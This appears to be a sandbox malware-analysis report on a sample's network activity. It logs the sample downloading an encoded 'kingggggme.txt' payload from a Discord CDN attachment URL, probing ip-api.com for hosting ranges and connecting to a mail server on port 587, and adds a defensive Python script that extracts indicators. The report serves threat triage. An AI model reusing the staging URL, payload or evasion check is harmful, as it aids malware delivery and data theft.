                              Sep 26, 2024 09:18:54.369952917 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.369982958 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.369988918 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.370017052 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.370044947 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.371017933 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.371062040 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.371097088 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.371103048 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.371124029 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.371153116 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372107029 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372148037 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372199059 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372204065 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372232914 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372260094 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372699976 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372756004 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372795105 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372800112 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.372826099 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.372858047 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373260975 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373316050 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373331070 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373338938 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373377085 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373445988 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373552084 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373599052 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373650074 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373655081 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373681068 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373704910 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.373752117 CEST44349731162.159.134.233192.168.2.4
                              Sep 26, 2024 09:18:54.373806953 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.375844955 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.377594948 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:54.387025118 CEST49731443192.168.2.4162.159.134.233
                              Sep 26, 2024 09:18:55.443361044 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:18:55.448268890 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:18:55.448342085 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:18:55.448527098 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:18:55.453630924 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:18:56.173146963 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:18:56.173299074 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:18:56.173372030 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:18:56.789660931 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:56.794625998 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:56.794737101 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:57.440876961 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:57.441437960 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:57.446379900 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:57.607733011 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:57.608017921 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:57.613971949 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.035113096 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.036175013 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.036251068 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.046757936 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.055841923 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.222718000 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.222759008 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.222795010 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.222831011 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.250165939 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.257999897 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.419301033 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.433442116 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.440336943 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.601455927 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.602745056 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.607675076 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.768929958 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.769290924 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.774132967 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.938026905 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:58.938465118 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:58.943454981 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.117639065 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.118005991 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.122925997 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.597043991 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.597101927 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.597266912 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.597414970 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.602271080 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.763427019 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.764264107 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.764347076 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.764390945 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.764410973 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:18:59.769165039 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.769227028 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.769368887 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:18:59.769403934 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:19:00.063638926 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:19:00.112437963 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:19:46.860256910 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:19:46.860441923 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:20:36.160512924 CEST4973280192.168.2.4208.95.112.1
                              Sep 26, 2024 09:20:36.165497065 CEST8049732208.95.112.1192.168.2.4
                              Sep 26, 2024 09:20:36.737802982 CEST49733587192.168.2.478.110.166.82
                              Sep 26, 2024 09:20:36.742779016 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:20:36.904401064 CEST5874973378.110.166.82192.168.2.4
                              Sep 26, 2024 09:20:36.912650108 CEST49733587192.168.2.478.110.166.82
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 09:18:53.048355103 CEST | 49427 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 09:18:53.055481911 CEST | 53 | 49427 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 09:18:55.431085110 CEST | 59962 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 09:18:55.437942982 CEST | 53 | 59962 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 09:18:56.721034050 CEST | 58174 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 09:18:56.788402081 CEST | 53 | 58174 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 09:19:33.249334097 CEST | 53 | 50568 | 162.159.36.2 | 192.168.2.4
Sep 26, 2024 09:19:33.741158962 CEST | 58556 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 09:19:33.755312920 CEST | 53 | 58556 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 09:18:53.048355103 CEST | 192.168.2.4 | 1.1.1.1 | 0xcf27 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:18:55.431085110 CEST | 192.168.2.4 | 1.1.1.1 | 0xa1b2 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:18:56.721034050 CEST | 192.168.2.4 | 1.1.1.1 | 0x9522 | Standard query (0) | mail.zqamcx.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:19:33.741158962 CEST | 192.168.2.4 | 1.1.1.1 | 0xd0bf | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 09:18:53.055481911 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf27 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:18:53.055481911 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf27 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:18:53.055481911 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf27 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:18:53.055481911 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf27 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:18:53.055481911 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf27 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:18:55.437942982 CEST | 1.1.1.1 | 192.168.2.4 | 0xa1b2 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:18:56.788402081 CEST | 1.1.1.1 | 192.168.2.4 | 0x9522 | No error (0) | mail.zqamcx.com | zqamcx.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:18:56.788402081 CEST | 1.1.1.1 | 192.168.2.4 | 0x9522 | No error (0) | zqamcx.com |  | 78.110.166.82 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:19:33.755312920 CEST | 1.1.1.1 | 192.168.2.4 | 0xd0bf | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                              • cdn.discordapp.com
                              • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 208.95.112.1 | 80 | 4136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 09:18:55.448527098 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Sep 26, 2024 09:18:56.173146963 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 07:18:55 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false
Sep 26, 2024 09:18:56.173299074 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 07:18:55 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false
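Added example, not code from the Joe Sandbox report or from the sample: a Python triage script that turns the DNS answers, client-initiated TCP flows and HTTP sessions shown on this page into findings and an IOC list. The input records are transcribed from the tables above (the Discord CDN session that follows included); the Flow/HttpExchange field names, the finding labels, the 100 kB text/plain threshold and the "unknown process" attribution for the TCP/587 flow (this section lists no process for it) are this script's own assumptions. It labels each outbound flow with the name the sample resolved for the destination, flags the GET /line/?fields=hosting probe to ip-api.com (the sample asking whether it runs in a hosting range; the answer here was false) and the connection to port 587 (mail submission) at mail.zqamcx.com, and collects domains, IPs and URLs.

```python
"""Turn the network tables of a sandbox report into findings and IOCs.

Added example; not code from the report or the sample. The records below
are transcribed from the DNS, TCP and HTTP tables on this page; the field
names, finding labels and thresholds are this script's own assumptions.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Flow:
    ts: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    process: Optional[str] = None   # only the HTTP session tables name a process


@dataclass(frozen=True)
class HttpExchange:
    scheme: str
    host: str
    path: str
    status: int
    content_type: str
    content_length: int
    body: str                        # leading bytes of the response body


# Constructed input, transcribed from the report tables (name -> A record).
DNS_ANSWERS = [
    ("cdn.discordapp.com", "162.159.134.233"),
    ("ip-api.com", "208.95.112.1"),
    ("mail.zqamcx.com", "78.110.166.82"),   # answered through CNAME zqamcx.com
]

# One entry per client-initiated TCP connection (first packet of each 5-tuple).
FLOWS = [
    Flow("09:18:53", "192.168.2.4", 49731, "162.159.134.233", 443,
         r"C:\Users\user\Desktop\450230549.exe"),
    Flow("09:18:55", "192.168.2.4", 49732, "208.95.112.1", 80,
         r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"),
    Flow("09:18:56", "192.168.2.4", 49733, "78.110.166.82", 587),   # process not listed
]

HTTP = [
    HttpExchange("https", "cdn.discordapp.com",
                 "/attachments/1288648799220400244/1288752046828425256/kingggggme.txt",
                 200, "text/plain; charset=utf-8", 327008, ""),
    HttpExchange("http", "ip-api.com", "/line/?fields=hosting",
                 200, "text/plain; charset=utf-8", 6, "false\n"),
]

MAIL_PORTS = {25: "smtp", 465: "smtps", 587: "submission"}
LARGE_TEXT_BYTES = 100_000          # assumed threshold; tune per environment


def name_for(ip: str, answers=DNS_ANSWERS) -> Optional[str]:
    """Map a destination IP back to the name the sample resolved for it."""
    for name, addr in answers:
        if addr == ip:
            return name
    return None


def flow_findings(flow: Flow, answers=DNS_ANSWERS) -> list:
    """Flag mail-port connections and connections with no preceding DNS answer."""
    out = []
    name = name_for(flow.dst_ip, answers)
    if flow.dst_port in MAIL_PORTS:
        who = flow.process or "unknown process"
        out.append(f"mail_port:{MAIL_PORTS[flow.dst_port]} {who} -> "
                   f"{name or flow.dst_ip}:{flow.dst_port}")
    if name is None:                 # direct-to-IP connection, no lookup seen
        out.append(f"no_dns:{flow.dst_ip}")
    return out


def http_findings(x: HttpExchange) -> list:
    """Flag the hosting-range probe and a large text/plain download (staged payload)."""
    out = []
    if x.host == "ip-api.com" and "fields=hosting" in x.path:
        out.append(f"hosting_check answer={x.body.strip()!r}")
    if x.content_type.startswith("text/plain") and x.content_length >= LARGE_TEXT_BYTES:
        out.append(f"large_text_download {x.host}{x.path.split('?')[0]} "
                   f"bytes={x.content_length}")
    return out


def iocs(flows=FLOWS, http=HTTP, answers=DNS_ANSWERS) -> dict:
    """Domains, remote IPs and URLs. The query string is dropped because the
    Discord ex/is/hm parameters are time-limited signatures, not indicators."""
    return {
        "domains": sorted({n for n, _ in answers}),
        "ips": sorted({f.dst_ip for f in flows},
                      key=lambda s: tuple(int(o) for o in s.split("."))),
        "urls": sorted(f"{x.scheme}://{x.host}{x.path.split('?')[0]}" for x in http),
    }


def triage(flows=FLOWS, http=HTTP, answers=DNS_ANSWERS) -> dict:
    findings = []
    for f in flows:
        findings.extend(flow_findings(f, answers))
    for x in http:
        findings.extend(http_findings(x))
    return {"findings": findings, "iocs": iocs(flows, http, answers)}


if __name__ == "__main__":
    result = triage()
    for line in result["findings"]:
        print(line)
    for kind, values in result["iocs"].items():
        print(kind + ":", ", ".join(values))
```

The flow table is reduced to the first client packet of each 5-tuple on purpose: the TLS ACK flurry above carries no triage value beyond the fact that 49731 talked to cdn.discordapp.com:443. A no_dns finding never fires on this report because every remote IP here was preceded by a lookup; it is kept because AgentTesla-style builds that carry a hard-coded SMTP IP would trip it.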


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 162.159.134.233 | 443 | 7068 | C:\Users\user\Desktop\450230549.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:18:53 UTC | 227 | OUT | GET /attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
2024-09-26 07:18:53 UTC | 1167 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 07:18:53 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 327008
Connection: close
CF-Ray: 8c917b89e9790cbe-EWR
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 292
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="kingggggme.txt"
ETag: "1d67d8fd28fdc38b1606e7bd4c223a9d"
Expires: Fri, 26 Sep 2025 07:18:53 GMT
Last-Modified: Thu, 26 Sep 2024 06:40:31 GMT
Vary: Accept-Encoding
x-goog-generation: 1727332831882171
x-goog-hash: crc32c=F3gHFg==
x-goog-hash: md5=HWfY/Sj9w4sWBue9TCI6nQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 327008
x-guploader-uploadid: AD-8lju3uJoGBfUAjwTgY9LbeXLUt8urYA2Htf6w7r-KcxQncnAirdRbyxFxxRBN4SBcXOT49-k9E6it_w
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=Pum18emwImaEK5bNXVp_zo.NNpZ5vtLIxEQ5usxtLiE-1727335133-1.0.1.1-PezEQaCmvqKeBQo9FLqK.8k4JYbfqK4GeJl4xB.kjIzDJ4UUY.hvXapfTguv4H2a3.5suaB797hrwIwipPwT4A; path=/; expires=Thu, 26-Sep-24 07:48:53 GMT; domain=.discordapp.com; HttpOnly; Secure
2024-09-26 07:18:53 UTC | 521 | IN | Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 31 6b 68 66 54 7a 48 6b 49 38 4f 79 41 77 34 32 43 68 4f 6e 25 32 46 62 70 38 4d 33 76 6b 53 25 32 42 6e 4c 4a 46 35 49 76 4d 74 79 4f 51 72 33 66 47 76 50 65 48 4c 73 37 55 76 62 43 6f 76 6b 41 74 66 25 32 42 4d 62 33 5a 42 54 25 32 46 4f 32 58 6a 51 42 50 57 7a 38 35 6c 70 50 63 47 66 66 52 78 45 69 6e 51 5a 6f 52 30 71 56 38 4f 78 77 25 32 42 37 67 48 69 71 68 4d 75 55 72 6c 44 6e 53 52 25 32 46 70 6c 32 74 46 44 52 38 62 55 55 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1khfTzHkI8OyAw42ChOn%2Fbp8M3vkS%2BnLJF5IvMtyOQr3fGvPeHLs7UvbCovkAtf%2BMb3ZBT%2FO2XjQBPWz85lpPcGffRxEinQZoR0qV8Oxw%2B7gHiqhMuUrlDnSR%2Fpl2tFDR8bUUw%3D%3D"}],"group":"cf-nel","max
2024-09-26 07:18:53 UTC | 1050 | IN | Data Raw: 66 4b 32 4e 61 51 78 48 56 59 5a 56 54 41 6f 2b 4e 65 4c 79 57 4e 6b 4c 67 47 45 66 74 62 47 65 73 48 52 63 61 77 39 41 46 64 57 72 67 35 48 6f 65 42 48 4b 79 4f 42 62 63 55 54 2b 65 71 7a 64 38 6e 76 6a 31 56 58 54 6b 33 6c 74 39 50 41 51 5a 44 7a 4d 73 65 52 31 44 69 44 65 75 43 47 77 69 69 57 57 53 50 48 41 73 55 54 32 50 79 79 35 77 7a 72 5a 36 46 5a 76 4f 59 6a 67 54 7a 53 30 4b 34 74 32 33 55 67 64 49 62 6e 50 38 6a 73 50 48 49 6c 6a 6c 6b 74 45 72 4e 5a 72 65 79 7a 5a 53 57 74 2f 2b 30 37 31 54 58 58 6f 6a 35 38 43 75 62 32 69 32 30 6f 51 77 51 71 69 6c 75 7a 57 2b 76 30 76 36 79 78 44 79 78 6d 6a 67 6b 37 37 34 64 78 43 74 2f 38 6f 41 57 67 6b 55 73 4d 31 2f 79 77 65 53 62 2b 67 47 69 61 52 34 6a 2f 77 5a 4c 33 58 74 61 41 4f 61 61 70 65 34 50 54
Data Ascii: fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6FZvOYjgTzS0K4t23UgdIbnP8jsPHIljlktErNZreyzZSWt/+071TXXoj58Cub2i20oQwQqiluzW+v0v6yxDyxmjgk774dxCt/8oAWgkUsM1/yweSb+gGiaR4j/wZL3XtaAOaape4PT
2024-09-26 07:18:53 UTC | 1369 | IN | Data Raw: 47 68 67 59 51 70 52 4b 74 75 48 37 65 64 30 41 31 46 4c 72 66 46 44 4a 4d 47 67 76 6a 59 6e 45 37 57 5a 4c 58 47 71 2f 6e 45 53 47 73 6c 78 56 64 6b 6b 52 44 77 76 5a 39 55 73 6c 77 48 74 36 36 73 64 32 44 44 73 47 45 47 33 48 45 63 35 4a 64 2f 56 31 75 4f 76 52 50 67 59 57 47 79 68 76 2b 4e 74 6d 71 70 4c 42 47 69 75 66 35 66 68 71 49 2b 58 39 78 43 72 4c 51 51 42 4a 74 6c 73 6e 6e 6b 6d 37 37 41 6c 59 57 39 72 45 73 74 49 6c 49 63 41 46 34 4c 59 5a 66 4b 58 53 67 48 76 45 61 41 6b 70 30 79 4e 58 35 42 6e 62 75 4b 66 58 54 72 6b 4e 67 6e 38 5a 6e 50 73 6d 39 4f 68 49 63 48 64 44 54 6b 4b 6f 31 58 70 78 78 45 38 68 56 42 68 78 39 69 43 35 35 58 2b 39 37 71 70 35 79 41 52 4c 51 4f 31 31 5a 6f 35 73 4a 44 31 6a 4f 56 75 79 34 49 75 2b 39 2b 4d 66 73 6d 67
Data Ascii: GhgYQpRKtuH7ed0A1FLrfFDJMGgvjYnE7WZLXGq/nESGslxVdkkRDwvZ9UslwHt66sd2DDsGEG3HEc5Jd/V1uOvRPgYWGyhv+NtmqpLBGiuf5fhqI+X9xCrLQQBJtlsnnkm77AlYW9rEstIlIcAF4LYZfKXSgHvEaAkp0yNX5BnbuKfXTrkNgn8ZnPsm9OhIcHdDTkKo1XpxxE8hVBhx9iC55X+97qp5yARLQO11Zo5sJD1jOVuy4Iu+9+Mfsmg
2024-09-26 07:18:53 UTC | 581 | IN | Data Raw: 64 39 79 57 4b 32 62 2f 32 42 44 74 43 47 68 64 6b 74 34 76 6e 59 43 2f 6c 49 61 51 67 77 53 58 6f 73 55 43 6c 78 79 67 48 30 6e 69 36 63 62 42 4a 34 42 33 64 61 7a 73 55 34 62 78 75 7a 6a 7a 6b 44 2f 75 66 48 6f 72 38 61 6f 42 42 4d 75 71 75 62 6b 71 30 56 4c 52 57 72 45 59 31 4e 56 67 52 6c 69 6e 34 79 6b 61 30 69 64 58 68 42 36 67 6a 6e 32 6e 53 62 48 6d 4a 46 45 4b 76 78 5a 63 66 35 76 43 58 66 56 47 6a 48 36 6c 2b 69 70 51 4c 33 6d 2f 4f 75 31 6e 43 6a 30 4f 55 54 75 49 65 63 63 74 39 52 31 59 6a 4c 55 36 54 79 68 5a 4a 6a 54 47 59 47 45 38 30 66 33 4d 7a 59 37 73 47 63 63 4a 6a 30 51 4e 76 67 38 36 2f 75 38 78 47 49 74 64 71 71 6c 42 72 56 71 2f 76 72 54 57 36 79 31 4b 66 52 67 46 6c 6b 51 58 4b 4d 66 59 35 32 71 69 4b 7a 69 71 2b 44 48 34 6f 73 74
Data Ascii: d9yWK2b/2BDtCGhdkt4vnYC/lIaQgwSXosUClxygH0ni6cbBJ4B3dazsU4bxuzjzkD/ufHor8aoBBMuqubkq0VLRWrEY1NVgRlin4yka0idXhB6gjn2nSbHmJFEKvxZcf5vCXfVGjH6l+ipQL3m/Ou1nCj0OUTuIecct9R1YjLU6TyhZJjTGYGE80f3MzY7sGccJj0QNvg86/u8xGItdqqlBrVq/vrTW6y1KfRgFlkQXKMfY52qiKziq+DH4ost
2024-09-26 07:18:53 UTC | 1369 | IN | Data Raw: 46 75 5a 33 44 57 67 73 56 4d 7a 77 45 42 6e 78 6e 6a 54 4c 75 41 36 43 61 38 30 46 44 4b 54 30 79 49 53 4f 39 62 76 73 72 77 77 41 66 72 42 75 6a 57 58 73 4f 37 65 43 6c 46 48 4f 76 4f 47 74 6d 44 42 43 6c 63 61 49 74 68 54 78 62 41 56 51 61 6f 35 45 36 4b 53 63 53 4e 71 30 51 6f 65 52 52 2b 4a 64 6c 54 69 70 42 42 5a 67 30 47 71 71 41 5a 39 77 32 35 56 30 4c 68 71 4e 55 76 4f 68 74 45 79 56 75 36 6c 6e 52 34 51 46 65 62 53 45 48 59 71 67 66 63 52 37 73 49 2b 58 49 58 54 75 58 7a 64 76 41 72 59 58 6f 58 36 79 72 43 4f 6d 6c 56 41 79 6a 2b 51 42 78 71 30 59 4f 46 45 53 43 38 34 56 78 52 34 4a 59 45 4d 4d 52 57 51 45 2f 74 39 53 7a 31 69 67 30 44 2f 4d 32 58 6e 30 41 70 4f 4c 43 5a 62 42 61 62 77 7a 5a 4f 79 53 31 2f 48 76 58 77 68 74 45 65 66 41 62 6b 49
Data Ascii: FuZ3DWgsVMzwEBnxnjTLuA6Ca80FDKT0yISO9bvsrwwAfrBujWXsO7eClFHOvOGtmDBClcaIthTxbAVQao5E6KScSNq0QoeRR+JdlTipBBZg0GqqAZ9w25V0LhqNUvOhtEyVu6lnR4QFebSEHYqgfcR7sI+XIXTuXzdvArYXoX6yrCOmlVAyj+QBxq0YOFESC84VxR4JYEMMRWQE/t9Sz1ig0D/M2Xn0ApOLCZbBabwzZOyS1/HvXwhtEefAbkI
